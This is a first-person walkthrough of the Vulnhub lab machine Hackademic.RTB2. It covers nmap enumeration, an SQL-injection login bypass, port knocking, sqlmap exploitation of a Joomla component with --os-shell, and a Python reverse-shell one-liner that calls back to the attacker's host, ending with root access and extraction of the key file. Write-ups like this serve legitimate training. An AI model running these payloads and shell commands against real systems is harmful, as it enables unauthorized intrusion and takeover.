Enumeration With Nmap

# Nmap 7.91 scan initiated Mon Sep 27 09:18:59 2021 as: nmap -sC -sV -p- -vv -oA nmap 172.16.139.228
Nmap scan report for 172.16.139.228
Host is up, received syn-ack (0.0017s latency).
Scanned at 2021-09-27 09:18:59 WAT for 9s
Not shown: 65534 closed ports
Reason: 65534 conn-refused
PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.2.14 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Hackademic.RTB2

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 27 09:19:08 2021 -- 1 IP address (1 host up) scanned in 8.95 seconds

Should be easy i guess we are having only one port which is the HTTP port 80 let hit it.

Ahhh the demon login page i will say damn because man i was stuck for some hours after trying sql injection, sqlmap man i got nothing you know what is funny man it actually vulnerable to sql injection after checking up write up for the part.

username:- ' or 1=1--'
password:- ' or 1=1--'

That the sql injection that work i don’t why all the payloads i try was not working.

Now we are in let check the page source maybe we can get some clues to move on.

I think we have something in the source.

It url-encoding so using CyberChef i Url-decode it and we have hex.

Decoding from hex and we have binary with a hint:- Knock Knock Knockin' on heaven's door .. :) .

Boom we have the port sequence to knock i will be using nmap to recursively hit the ports using the -r switch.

nmap -r -p 1001,1101,1011,1001 172.16.139.230

┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
└─$ nmap -r -p 1001,1101,1011,1001 172.16.139.230
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-27 12:15 WAT
WARNING: Duplicate port number(s) specified.  Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm).
Nmap scan report for 172.16.139.230
Host is up (0.0033s latency).

PORT     STATE  SERVICE
1001/tcp closed webpush
1011/tcp closed unknown
1101/tcp closed pt2-discover

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
└─$ nmap -sV 172.16.139.230                      
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-27 12:16 WAT
Nmap scan report for 172.16.139.230
Host is up (0.0015s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.23 seconds
                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
└─$ nmap -sV 172.16.139.230                      
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-27 12:16 WAT
Nmap scan report for 172.16.139.230
Host is up (0.0019s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd 2.2.14 ((Ubuntu))
666/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds
                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]

We have a new port open now let try to access it.

Powered by joomla smmooth going through the pages i found something interesting with some strange parameters.

I decided to test it with sqlmap.

┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
└─$ sqlmap -u "http://172.16.139.230:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" --dbs   

Boom it vulnerable to SQL injection let try using the os-shell switch onsqlmap with the database joomla.

┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
└─$ sqlmap -u "http://172.16.139.230:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -D joomla --os-shell
        ___

We have shell smooth right, Now let try and get a proper shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.139.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now let root it we are taking long man lol.

Privilege Escalation

Pretty old versions let hit exploit-db.

We have the exploit now let get it onto our taget and compile it.

Ruuning and boom root.

Getting The Key.txt in the root folder.

But it in base64 let try and get it out.

Starting SimpleHTTPServer on the target open port 8000 on the target which we can access with the target IP:8000.

Now let get the Key.txt to decode.

Using CyberChef we know it a PNG image encode in base64.

Using CyberChef to convert it back to PNG.

We are done.

Greeting From Muzec

Back To Home